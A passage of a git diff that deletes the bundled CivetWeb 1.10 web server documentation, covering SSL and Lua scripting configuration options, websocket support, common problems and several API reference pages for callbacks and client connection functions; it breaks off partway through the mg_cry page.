-by the server, except scripts (CGI, Lua, ..) and callbacks. They must 
-send HTTP headers on their own.
-
-The time is specified in seconds. If this configuration is not set, 
-or set to -1, no `Strict-Transport-Security` header will be sent.
-For values <-1 and values >31622400, the behavior is undefined.
-
-### decode\_url `yes`
-URL encoded request strings are decoded in the server, unless it is disabled
-by setting this option to `no`.
-
-### ssl\_verify\_peer `no`
-Enable client's certificate verification by the server.
-
-### ssl\_ca\_path
-Name of a directory containing trusted CA certificates. Each file in the
-directory must contain only a single CA certificate. The files must be named
-by the subject name’s hash and an extension of “.0”. If there is more than one
-certificate with the same subject name they should have extensions ".0", ".1",
-".2" and so on respectively.
-
-### ssl\_ca\_file
-Path to a .pem file containing trusted certificates. The file may contain
-more than one certificate.
-
-### ssl\_verify\_depth `9`
-Sets maximum depth of certificate chain. If client's certificate chain is longer
-than the depth set here connection is refused.
-
-### ssl\_default\_verify\_paths `yes`
-Loads default trusted certificates locations set at openssl compile time.
-
-### ssl\_cipher\_list
-List of ciphers to present to the client. Entries should be separated by
-colons, commas or spaces.
-
-    ALL           All available ciphers
-    ALL:!eNULL    All ciphers excluding NULL ciphers
-    AES128:!MD5   AES 128 with digests other than MD5
-
-See [this entry](https://www.openssl.org/docs/manmaster/apps/ciphers.html) in
-OpenSSL documentation for full list of options and additional examples.
-
-### ssl\_protocol\_version `0`
-Sets the minimal accepted version of SSL/TLS protocol according to the table:
-
-Protocols | Value
------------- | -------------
-SSL2+SSL3+TLS1.0+TLS1.1+TLS1.2  | 0
-SSL3+TLS1.0+TLS1.1+TLS1.2  | 1
-TLS1.0+TLS1.1+TLS1.2 | 2
-TLS1.1+TLS1.2 | 3
-TLS1.2 | 4
-
-### ssl\_short\_trust `no`
-Enables the use of short lived certificates. This will allow for the certificates
-and keys specified in `ssl_certificate`, `ssl_ca_file` and `ssl_ca_path` to be
-exchanged and reloaded while the server is running.
-
-In an automated environment it is advised to first write the new pem file to
-a different filename and then to rename it to the configured pem file name to
-increase performance while swapping the certificate.
-
-Disk IO performance can be improved when keeping the certificates and keys stored
-on a tmpfs (linux) on a system with very high throughput.
-
-### allow\_sendfile\_call `yes`
-This option can be used to enable or disable the use of the Linux `sendfile` system call. It is only available for Linux systems and only affecting HTTP (not HTTPS) connections if `throttle` is not enabled. While using the `sendfile` call will lead to a performance boost for HTTP connections, this call may be broken for some file systems and some operating system versions.
-
-### case\_sensitive `no`
-This option can be used to enable case-sensitive URLs for Windows servers. It is only available for Windows systems. Windows file systems are not case sensitive, but they still store the file name including case. If this option is set to `yes`, the comparison for URIs and Windows file names will be case sensitive.
-
-### allow\_index\_script\_resource `no`
-Index scripts (like `index.cgi` or `index.lua`) may have script handled resources.
-
-If this feature is activated, then /some/path/file.ext might be handled by:
-  1. /some/path/file.ext (with PATH\_INFO='/', if ext = cgi)
-  2. /some/path/index.lua with mg.request\_info.path\_info='/file.ext'
-  3. /some/path/index.cgi with PATH\_INFO='/file.ext'
-  4. /some/path/index.php with PATH\_INFO='/file.ext'
-  5. /some/index.lua with mg.request\_info.path\_info=='/path/file.ext'
-  6. /some/index.cgi with PATH\_INFO='/path/file.ext'
-  7. /some/index.php with PATH\_INFO='/path/file.ext'
-  8. /index.lua with mg.request\_info.path\_info=='/some/path/file.ext'
-  9. /index.cgi with PATH\_INFO='/some/path/file.ext'
-  10. /index.php with PATH\_INFO='/some/path/file.ext'
-
-Note: This example is valid, if the default configuration values for `index_files`, `cgi_pattern` and `lua_script_pattern` are used, and the server is built with CGI and Lua support enabled.
-
-If this feature is not activated, only the first file (/some/path/file.cgi) will be accepted.
-
-Note: This parameter affects only index scripts. A path like /here/script.cgi/handle/this.ext will call /here/script.cgi with PATH\_INFO='/handle/this.ext', no matter if this option is set to `yes` or `no`. 
-
-This feature can be used to completely hide the script extension from the URL.
-
-### additional\_header
-Send additional HTTP response header line for every request.
-The full header line including key and value must be specified, excluding the carriage return line feed.
-
-Example (used as command line option): 
-`-additional_header "X-Frame-Options: SAMEORIGIN"`
-
-This option can be specified multiple times. All specified header lines will be sent.
-
-# Lua Scripts and Lua Server Pages
-Pre-built Windows and Mac civetweb binaries have built-in Lua scripting
-support as well as support for Lua Server Pages.
-
-Lua scripts (default extension: *.lua) use plain Lua syntax.
-The body of the script file is not sent directly to the client,
-the Lua script must send header and content of the web page by calling
-the function mg.write(text).
-
-Lua Server Pages (default extensions: *.lsp, *.lp) are html pages containing
-script elements similar to PHP, using the Lua programming language instead of
-PHP. Lua script elements must be enclosed in `<?  ?>` blocks, and can appear
-anywhere on the page. Furthermore, Lua Server Pages offer the opportunity to
-insert the content of a variable by enclosing the Lua variable name in
-`<?=  ?>` blocks, similar to PHP.
-For example, to print the current weekday name and the URI of the current
-page, one can write:
-
-    <p>
-      <span>Today is:</span>
-      <? mg.write(os.date("%A")) ?>
-    </p>
-    <p>
-      URI is <?=mg.request_info.uri?>
-    </p>
-
-Lua is known for it's speed and small size. Civetweb currently uses Lua
-version 5.2.4. The documentation for it can be found in the
-[Lua 5.2 reference manual](http://www.lua.org/manual/5.2/).
-
-
-Note that this example uses function `mg.write()`, which sends data to the
-web client. Using `mg.write()` is the way to generate web content from inside
-Lua code. In addition to `mg.write()`, all standard Lua library functions
-are accessible from the Lua code (please check the reference manual for
-details). Lua functions working on files (e.g., `io.open`) use a path
-relative to the working path of the civetweb process. The web server content
-is located in the path `mg.document_root`.
-Information on the request is available in the `mg.request_info`
-object, like the request method, all HTTP headers, etcetera.
-
-[page2.lua](https://github.com/civetweb/civetweb/blob/master/test/page2.lua)
-is an example for a plain Lua script.
-
-[page2.lp](https://github.com/civetweb/civetweb/blob/master/test/page2.lp)
-is an example for a Lua Server Page.
-
-Both examples show the content of the `mg.request_info` object as the page
-content. Please refer to `struct mg_request_info` definition in
-[civetweb.h](https://github.com/civetweb/civetweb/blob/master/include/civetweb.h)
-to see additional information on the elements of the `mg.request_info` object.
-
-Civetweb also provides access to the [SQlite3 database](http://www.sqlite.org/)
-through the [LuaSQLite3 interface](http://lua.sqlite.org/index.cgi/doc/tip/doc/lsqlite3.wiki)
-in Lua. Examples are given in
-[page.lua](https://github.com/civetweb/civetweb/blob/master/test/page.lua) and
-[page.lp](https://github.com/civetweb/civetweb/blob/master/test/page.lp).
-
-
-Civetweb exports the following functions to Lua:
-
-mg (table):
-
-    mg.read()                  -- reads a chunk from POST data, returns it as a string
-    mg.write(str)              -- writes string to the client
-    mg.include(filename, [pathtype]) -- include another Lua Page file (Lua Pages only)
-                               -- pathtype can be "abs", "rel"/"file" or "virt[ual]"
-                               -- like defined for SSI #include
-    mg.redirect(uri)           -- internal redirect to a given URI
-    mg.onerror(msg)            -- error handler, can be overridden
-    mg.version                 -- a string that holds Civetweb version
-    mg.document_root           -- a string that holds the document root directory
-    mg.auth_domain             -- a string that holds the HTTP authentication domain
-    mg.get_var(str, varname)   -- extract variable from (query) string
-    mg.get_cookie(str, cookie) -- extract cookie from a string
-    mg.get_mime_type(filename) -- get MIME type of a file
-    mg.get_info(infotype)      -- get server status information
-    mg.send_file(filename)     -- send a file, including MIME type
-    mg.url_encode(str)         -- URL encode a string
-    mg.url_decode(str, [form]) -- URL decode a string. If form=true, replace + by space.
-    mg.base64_encode(str)      -- BASE64 encode a string
-    mg.base64_decode(str)      -- BASE64 decode a string
-    mg.md5(str)                -- return the MD5 hash of a string
-    mg.keep_alive(bool)        -- allow/forbid to use http keep-alive for this request
-    mg.request_info            -- a table with the following request information
-         .remote_addr          -- IP address of the client as string
-         .remote_port          -- remote port number
-         .server_port          -- server port number
-         .request_method       -- HTTP method (e.g.: GET, POST)
-         .http_version         -- HTTP protocol version (e.g.: 1.1)
-         .uri                  -- resource name
-         .query_string         -- query string if present, nil otherwise
-         .script_name          -- name of the Lua script
-         .https                -- true if accessed by https://, false otherwise
-         .remote_user          -- user name if authenticated, nil otherwise
-
-connect (function):
-
-    -- Connect to the remote TCP server. This function is an implementation
-    -- of simple socket interface. It returns a socket object with three
-    -- methods: send, recv, close, which are synchronous (blocking).
-    -- connect() throws an exception on connection error.
-    connect(host, port, use_ssl)
-
-    -- Example of using connect() interface:
-    local host = 'code.google.com'  -- IP address or domain name
-    local ok, sock = pcall(connect, host, 80, 1)
-    if ok then
-      sock:send('GET /p/civetweb/ HTTP/1.0\r\n' ..
-                'Host: ' .. host .. '\r\n\r\n')
-      local reply = sock:recv()
-      sock:close()
-      -- reply now contains the web page https://code.google.com/p/civetweb
-    end
-
-
-All filename arguments are either absolute or relative to the civetweb working
-directory (not the document root or the Lua script/page file).
-    
-**IMPORTANT: Civetweb does not send HTTP headers for Lua pages. Therefore,
-every Lua Page must begin with a HTTP reply line and headers**, like this:
-
-    <? mg.write('HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n') ?>
-    <html><body>
-      ... the rest of the web page ...
-
-To serve a Lua Page, civetweb creates a Lua context. That context is used for
-all Lua blocks within the page. That means, all Lua blocks on the same page
-share the same context. If one block defines a variable, for example, that
-variable is visible in all block that follow.
-
-## Websockets for Lua
-Civetweb offers support for websockets in Lua as well. In contrast to plain
-Lua scripts and Lua server pages, Lua websocket scripts are shared by all clients.
-
-Lua websocket scripts must define a few functions:
-    open(arg)    -- callback to accept or reject a connection
-    ready(arg)   -- called after a connection has been established
-    data(arg)    -- called when the server receives data from the client
-    close(arg)   -- called when a websocket connection is closed
-All function are called with one argument of type table with at least one field
-"client" to identify the client. When "open" is called, the argument table additionally
-contains the "request_info" table as defined above. For the "data" handler, an
-additional field "data" is available. The functions "open", "ready" and "data"
-must return true in order to keep the connetion open.
-
-Lua websocket pages do support single shot (timeout) and interval timers.
-
-An example is shown in
-[websocket.lua](https://github.com/civetweb/civetweb/blob/master/test/websocket.lua).
-
-
-# Common Problems
-- PHP doesn't work - getting empty page, or 'File not found' error. The
-  reason for that is wrong paths to the interpreter. Remember that with PHP,
-  the correct interpreter is `php-cgi.exe` (`php-cgi` on UNIX).
-  Solution: specify the full path to the PHP interpreter, e.g.:
-    `civetweb -cgi_interpreter /full/path/to/php-cgi`
-
-- `php-cgi` is unavailable, for example on Mac OS X. As long as the `php` binary is installed, you can run CGI programs in command line mode (see the example below). Note that in this mode, `$_GET` and friends will be unavailable, and you'll have to parse the query string manually using [parse_str](http://php.net/manual/en/function.parse-str.php) and the `QUERY_STRING` environmental variable.
-
-        #!/usr/bin/php
-        <?php
-        echo "Content-Type: text/html\r\n\r\n";
-        echo "Hello World!\n";
-        ?>
-
-- Civetweb fails to start. If Civetweb exits immediately when started, this
-  usually indicates a syntax error in the configuration file
-  (named `civetweb.conf` by default) or the command-line arguments.
-  Syntax checking is omitted from Civetweb to keep its size low. However,
-  the Manual should be of help. Note: the syntax changes from time to time,
-  so updating the config file might be necessary after executable update.
-
-- Embedding with OpenSSL on Windows might fail because of calling convention.
-  To force Civetweb to use `__stdcall` convention, add `/Gz` compilation
-  flag in Visual Studio compiler.
-
diff --git a/thirdparty/civetweb-1.10/docs/_config.yml b/thirdparty/civetweb-1.10/docs/_config.yml
deleted file mode 100644
index 259a24e..0000000
--- a/thirdparty/civetweb-1.10/docs/_config.yml
+++ /dev/null
@@ -1 +0,0 @@
-theme: jekyll-theme-tactile
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_callbacks.md b/thirdparty/civetweb-1.10/docs/api/mg_callbacks.md
deleted file mode 100644
index c7d69a1..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_callbacks.md
+++ /dev/null
@@ -1,60 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_callbacks;`
-
-### Fields
-
-| Field | Description |
-| :--- | :--- |
-|**`begin_request`**|**`int (*begin_request)( struct mg_connection *conn );`**|
-| |The `begin_request()` callback function is called when CivetWeb has received a new HTTP request. If the callback function does not process the request, it should return 0. In that case CivetWeb will handle the request with the default callback routine. If the callback function returns a value between 1 and 999, CivetWeb does nothing and the callback function should do all the processing, including sending the proper HTTP headers etc. Starting at CivetWeb version 1.7, the function `begin_request()` is called before any authorization is done. If an authorization check is required, `request_handler()` should be used instead. The return value of the callback function is not only used to signal CivetWeb to not further process the request. The returned value is also stored as HTTP status code in the access log. |
-|**`connection_close`**|**`void (*connection_close)( const struct mg_connection *conn );`**|
-| |The callback function `connection_close()` is called when CivetWeb is closing a connection. The per-context mutex is locked when the callback function is invoked. The function is primarly useful for noting when a websocket is closing and removing it from any application-maintained list of clients. *Using this callback for websocket connections is deprecated. Use* `mg_set_websocket_handler()` *instead.*|
-|**`end_request`**|**`void (*end_request)(const struct mg_connection *conn, int reply_status_code);`**|
-| |The callback function `end_request()` is called by CivetWeb when a request has been completely processed. It sends the reply status code which was sent to the client to the application.|
-|**`exit_context`**|**`void (*exit_context)( const struct mg_context *ctx );`**|
-| |The callback function `exit_context()` is called by CivetWeb when the server is stopped. It allows the application to do some cleanup on the application side.|
-|**`http_error`**|**`int (*http_error)( struct mg_connection *conn, int status );`**|
-| |The callback function `http_error()` is called by CivetWeb just before an HTTP error is to be sent to the client. The function allows the application to send a custom error page. The status code of the error is provided as a parameter. If the application sends their own error page, it must return 1 to signal CivetWeb that no further processing is needed. If the returned value is 0, CivetWeb will send a built-in error page to the client.|
-|**`init_context`**|**`void (*init_context)( const struct mg_context *ctx );`**|
-| |The callback function `init_context()` is called after the CivetWeb server has been started and initialized, but before any requests are served. This allowes the application to perform some initialization activities before the first requests are handled.|
-|**`init_lua`**|**`void (*init_lua)( const struct mg_connection *conn, void *lua_context );`**|
-| |The callback function `init_lua()` is called just before a Lua server page is to be served. Lua page serving must have been enabled at compile time for this callback function to be called. The parameter `lua_context` is a `lua_State *` pointer.|
-|**`init_ssl`**|**`int (*init_ssl)( void *ssl_context, void *user_data );`**|
-| |The callback function `init_ssl()` is called when CivetWeb initializes the SSL library. The parameter `user_data` contains a pointer to the data which was provided to `mg_start()` when the server was started. The callback function can return 0 to signal that CivetWeb should setup the SSL certificate. With a return value of 1 the callback function signals CivetWeb that the certificate has already been setup and no further processing is necessary. The value -1 should be returned when the SSL initialization fails.|
-|**`init_thread`**|**`void (*init_thread)( const struct mg_context *ctx, int thread_type );`**|
-| |The callback function `init_thread()` is called when a new thread is created by CivetWeb. The `thread_type` parameter indicates which type of thread has been created. following thread types are recognized:|
-| |**0** - The master thread is created |
-| |**1** - A worker thread which handles client connections has been created|
-| |**2** - An internal helper thread (timer thread) has been created|
-|**`log_access`**|**`int (*log_access)( const struct mg_connection *conn, const char *message );`**|
-| |The callback function `log_access()` is called when CivetWeb is about to log a message. If the callback function returns 0, CivetWeb will use the default internal access log routines to log the access. If a non-zero value is returned, CivetWeb assumes that access logging has already been done and no further action is performed.|
-|**`log_message`**|**`int (*log_message)( const struct mg_connection *conn, const char *message );`**|
-| |The callback function `log_message()` is called when CivetWeb is about to log a message. If the callback function returns 0, CivetWeb will use the default internal log routines to log the message. If a non-zero value is returned CivetWeb assumes that logging has already been done and no further action is performed.|
-|**`open_file`**|**`const char *(*open_file)( const struct mg_connection *conn, const char *path, size_t *data_len );`**|
-| |The callback function `open_file()` is called when a file is to be opened by CivetWeb. The callback can return a pointer to a memory location and set the memory block size in the variable pointed to by `data_len` to signal CivetWeb that the file should not be loaded from disk, but that instead a stored version in memory should be used. If the callback function returns NULL, CivetWeb will open the file from disk. This callback allows caching to be implemented at the application side, or to serve specific files from static memory instead of from disk.|
-|~~`upload`~~|**`void (*upload)( struct mg_connection * conn, const char *file_name );`**|
-| |*Deprecated. Use* `mg_handle_form_request()` *instead.* The callback function `upload()` is called when CivetWeb has uploaded a file to a temporary directory as result of a call to `mg_upload()`. The parameter `file_name` contains the full file name including path to the uploaded file.|
-|~~`websocket_connect`~~|**`int (*websocket_connect)( const struct mg_connection *conn );`**|
-| |*Deprecated. Use* `mg_set_websocket_handler()` *instead.* The callback function `websocket_connect()` is called when a websocket request is received, before the actual websocket handshake has taken place. The callback function can signal to CivetWeb if it should accept or deny the incoming request with one of the following return values: |
-| |**0** - CivetWeb can proceed with the handshake to accept the connection |
-| |**1** - CivetWeb must close the connection immediately without performing a handshake |
-|~~`websocket_data`~~|**`int (*websocket_data)( struct mg_connection *conn, int bits, char *data, size_t data_len );`**|
-| |*Deprecated. Use* `mg_set_websocket_handler()` *instead.* The callback function `websocket_data()` is called when a data frame has been received from the client. The parameters contain the following information: |
-| | **`bits`** - The first byte of the websocket frame. See [RFC-6455](http://tools.ietf.org/html/rfc6455) at section 5.2 for more information. |
-| | **`data`** - The pointer to the received data block. Masks--if any--have already been applied. |
-| | **`data_len`** - The length of the received data block |
-| | If the application wants to keep the websocket open to receive more data, the callback function should return the value **1**. If the value **0** is returned by the callback function, CivetWeb will close the websocket connection and no more frames will be received.|
-|~~`websocket_ready`~~|**`int (*websocket_ready)( struct mg_connection *conn );`**|
-| |*Deprecated. Use* `mg_set_websocket_handler()` *instead.* The callback function `websocket_ready()` is called after the handshake of a websocket connection has succeeded succesfully to signal the application that the connection is ready for use. |
-
-### Description
-
-Much of the functionality in the Civetweb library is provided through callback functions. The application registers their own processing functions with the Civetweb library and when an event happens, the appropriate callback function is called. In this way an application is able to have their processing code right at the heart of the webserver, without the need to change the code of the webserver itself. A number of callback functions are registered when the civetweb subsystem is started. Other may be added or changed at runtime with helper functions.
-
-A pointer to a `mg_callbacks` structure is passed as parameter to the [`mg_start()`](mg_start.md) function to provide links to callback functions which the webserver will call at specific events. If a specific callback function is not supplied, CivetWeb will fallback to default internal callback routines. Callback functions give the application detailed control over how specific events should be handled.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
-* [`mg_stop();`](mg_stop.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_check_digest_access_authentication.md b/thirdparty/civetweb-1.10/docs/api/mg_check_digest_access_authentication.md
deleted file mode 100644
index fec3ad3..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_check_digest_access_authentication.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# Civetweb API Reference
-
-### `mg_check_digest_access_authentication( conn, realm, filename );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer to the connection to be used to send data |
-|**`realm`**|`const char *`| The requested authentication realm or NULL |
-|**`filename`**|`const char *`| The path to the passwords file |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| An integer indicating success or failure |
-
-### Description
-
-This function can be used to check if a request header contains HTTP digest authentication
-information, matching user and password encoded within the password file.
-If the authentication realm (also called authentication domain) is NULL, the parameter
-`authentication_domain` as specified in the server configuration (`mg_start()`) is used.
-
-A positive return value means, the user name, realm and a correct password hash have been
-found in the passwords file.
-A return of 0 means, reading the password file succeeded, but there was no matching user,
-realm and password.
-The function returns a negative number on errors.
-
-### See Also
-
-* [`mg_send_digest_access_authentication_request();`](mg_send_digest_access_authentication_request.md)
-* [`mg_modify_passwords_file();`](mg_modify_passwords_file.md)
-* [`mg_start();`](mg_start.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_check_feature.md b/thirdparty/civetweb-1.10/docs/api/mg_check_feature.md
deleted file mode 100644
index 1da1b07..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_check_feature.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# Civetweb API Reference
-
-### `mg_check_feature( feature );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`feature`**|`unsigned`| A value indicating the feature to be checked |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`unsigned`| A value indicating if a feature is available. A positive value indicates available, while **0** is returned for an unavailable feature |
-
-### Description
-
-The function `mg_check_feature()` can be called from an application program to check of specific features have been compiled in the civetweb version which the application has been linked to. The feature to check is provided as an unsigned integer parameter. If the function is available in the currently linked library version, a value **> 0** is returned. Otherwise the function `mg_check_feature()` returns the value **0**.
-
-The following parameter values can be used:
-
-| Value | Compilation option | Description |
-| :---: | :---: | :--- |
-| **1** | NO_FILES | *Able to serve files*.  If this feature is available, the webserver is able to serve files directly from a directory tree. |
-| **2** | NO_SSL | *Support for HTTPS*. If this feature is available, the webserver van use encryption in the client-server connection. SSLv2, SSLv3, TLSv1.0, TLSv1.1 and TLSv1.2 are supported depending on the SSL library CivetWeb has been compiled with, but which protocols are used effectively when the server is running is dependent on the options used when the server is started. |
-| **4** | NO_CGI | *Support for CGI*. If this feature is available, external CGI scripts can be called by the webserver. |
-| **8** | USE_IPV6 | *Support IPv6*. The CivetWeb library is capable of communicating over both IPv4 and IPv6, but IPv6 support is only available if it has been enabled at compile time. |
-| **16** | USE_WEBSOCKET | Support for web sockets. WebSockets support is available in the CivetWeb library if the proper options has been used during cimpile time. |
-| **32** | USE_LUA | *Support for Lua scripts and Lua server pages*. CivetWeb supports server side scripting through the Lua language, if that has been enabled at compile time. Lua is an efficient scripting language which is less resource heavy than for example PHP. |
-| **64** | USE_DUKTAPE | *Support for server side JavaScript*. Server side JavaScript can be used for dynamic page generation if the proper options have been set at compile time. Please note that client side JavaScript execution is always available if it has been enabled in the connecting browser. |
-| **128** | NO_CACHING | *Support for caching*. The webserver will support caching, if it has not been disabled while compiling the library. |
-
-Parameter values other than the values mentioned above will give undefined results. Therefore&mdash;although the parameter values for the `mg_check_feature()` function are effectively bitmasks, you should't assume that combining two of those values with an OR to a new value will give any meaningful results when the function returns.
-
-### See Also
-
-* [`mg_get_option();`](mg_get_option.md)
-* [~~`mg_get_valid_option_names();`~~](mg_get_valid_option_names.md)
-* [`mg_get_valid_options();`](mg_get_valid_options.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_client_cert.md b/thirdparty/civetweb-1.10/docs/api/mg_client_cert.md
deleted file mode 100644
index c81fbd0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_client_cert.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_client_cert;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`subject`**|`const char *`| The subject of the certificate |
-|**`issuer`**|`const char *`| The issuer of the certificate |
-|**`serial`**|`const char *`| The serial number of the certificate |
-|**`finger`**|`const char *`| The fingerprint of the certificate |
-
-### Description
-
-The structure `client_cert` is used as a sub-structure in the [`mg_request_info`](mg_request_info.md) structure to store information of an optional client supplied certificate.
-
-### See Also
-
-* [`struct mg_request_info;`](mg_request_info.md)
-* [`mg_get_request_info();`](mg_get_request_info.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_client_options.md b/thirdparty/civetweb-1.10/docs/api/mg_client_options.md
deleted file mode 100644
index f3b9b68..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_client_options.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_client_options;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`host`**|`const char *`|The hostname or IP address to connect to|
-|**`port`**|`int`|The port on the server|
-|**`client_cert`**|`const char *`|Pointer to client certificate|
-|**`server_cert`**|`const char *`|Pointer to a server certificate|
-
-### Description
-
-The the `mgclient_options` structure contains host and security information to connect as a client to another host. A parameter of this type is used in the call to the function [`mg_connect_client_secure();`](mg_connect_client_secure.md). Please note that IPv6 addresses are only permitted if IPv6 support was enabled during compilation. You can use the function [`mg_check_feature()`](mg_check_feature.md) with the parameter `USE_IPV6` while running your application to check if IPv6 is supported.
-
-### See Also
-
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_connect_client_secure();`](mg_connect_client_secure.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_close_connection.md b/thirdparty/civetweb-1.10/docs/api/mg_close_connection.md
deleted file mode 100644
index ca8d2a1..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_close_connection.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# Civetweb API Reference
-
-### `mg_close_connection( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection which must be closed|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_close_connection()` is used to close a connection which was opened with the [`mg_download()`](mg_download.md) function. Use of this function to close a connection which was opened in another way is undocumented and may give unexpected results.
-
-### See Also
-
-* [`mg_download();`](mg_download.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_connect_client.md b/thirdparty/civetweb-1.10/docs/api/mg_connect_client.md
deleted file mode 100644
index e2aa773..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_connect_client.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_connect_client( host, port, use_ssl, error_buffer, error_buffer_size );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`host`**|`const char *`|hostname or IP address of the server|
-|**`port`**|`int`|The port to connect to on the server|
-|**`use_ssl`**|`int`|Connects using SSL of this value is not zero|
-|**`error_buffer`**|`char *`|Buffer to store an error message|
-|**`error_buffer_size`**|`size_t`|Maximum size of the error buffer including the NUL terminator|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_connection *`||
-
-### Description
-
-The function `mg_connect_client()` connects to a TCP server as a client. This server can be a HTTP server but this is not necessary. The function returns a pointer to a connection structure when the connection is established and NULL otherwise. The host may be on IPv4 or IPv6, but IPv6 is not enabled in every Civetweb installation. Specifically the use of IPv6 communications has to be enabled when the library is compiled. At runtime you can use the [`mg_check_feature()`](mg_check_feature.md) function with the parameter `USE_IPV6` to check if IPv6 communication is supported.
- 
-### See Also
-
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_connect_client_secure();`](mg_connect_client_secure.md)
-* [`mg_connect_websocket_client();`](mg_connect_websocket_client.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_connect_client_secure.md b/thirdparty/civetweb-1.10/docs/api/mg_connect_client_secure.md
deleted file mode 100644
index a87949b..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_connect_client_secure.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_connect_client_secure( client_options, error_buffer, error_buffer_size );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`client_options`**|`const struct mg_client_options *`|Settings about the server connection|
-|**`error_buffer`**|`char *`|Buffer to store an error message|
-|**`error_buffer_size`**|`size_t`|Size of the error message buffer including the NUL terminator|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_connection *`||
-
-### Description
-
-The function `mg_connect_client_secure()` creates a secure connection with a server. The information about the connection and server is passed in a structure and an error message may be returned in a local buffer. The function returns a pointer to a `struct mg_connection` structure when successful and NULL otherwise.
-
-Please note that IPv6 communication is supported by Civetweb, but only if the use of IPv6 was enabled at compile time. The check while running a program if IPv6 communication is possible you can call [`mg_check_feature()`](mg_check_feature.md) with the `USE_IPV6` parameter to check if IPv6 communications can be used.
-
-### See Also
-
-* [`struct mg_client_options;`](mg_client_options.md)
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_connect_client();`](mg_connect_client.md)
-* [`mg_connect_websocket_client();`](mg_connect_websocket_client.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_connect_websocket_client.md b/thirdparty/civetweb-1.10/docs/api/mg_connect_websocket_client.md
deleted file mode 100644
index 8562b25..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_connect_websocket_client.md
+++ /dev/null
@@ -1,36 +0,0 @@
-# Civetweb API Reference
-
-### `mg_connect_websocket_client( host, port, use_ssl, error_buffer, error_buffer_size, path, origin, data_func, close_func, user-data);`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`host`**|`const char *`|The hostname or IP address of the server|
-|**`port`**|`int`|The port on the server|
-|**`use_ssl`**|`int`|Use SSL if this parameter is not equal to zero|
-|**`error_buffer`**|`char *`|Buffer to store an error message|
-|**`error_buffer_size`**|`size_t`|Size of the error message buffer including the NUL terminator|
-|**`path`**|`const char *`|The server path to connect to, for example `/app` if you want to connect to `localhost/app`|
-|**`origin`**|`const char *`|The value of the `Origin` HTTP header|
-|**`data_func`**|`mg_websocket_data_handler`|Callback which is used to process data coming back from the server|
-|**`close_func`**|`mg_websocket_close_handler`|Callback which is called when the connection is to be closed|
-|**`user_data`**|`void *`|User supplied argument|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_connection *`|A pointer to the connection structure, or NULL if connecting failed|
-
-### Description
-
-The function `mg_connect_websocket_client()` connects to a websocket on a server as a client. Data and close events are processed with callback functions which must be provided in the call.
-
-Civetweb supports both IPv4 and IPv6 communication, but only if the use if IPv6 has been enabled at compile time. When running an application it is possible to check if IPv6 addressing is available by calling the [`mg_check_feature()`](mg_check_feature.md) function with the `USE_IPV6` parameter.
-
-### See Also
-
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_connect_client();`](mg_connect_client.md)
-* [`mg_connect_client_secure();`](mg_connect_client_secure.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_cry.md b/thirdparty/civetweb-1.10/docs/api/mg_cry.md
deleted file mode 100644
index 0cf45c9..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_cry.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_cry( conn, fmt, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection on which a problem occured|
-|**`fmt`**|`const char *`|Format string without a line return|
-|**`...`**|*various*|Parameters depending on the format string|
-
-### Return Value
-
-*none*
-
-### Description
-
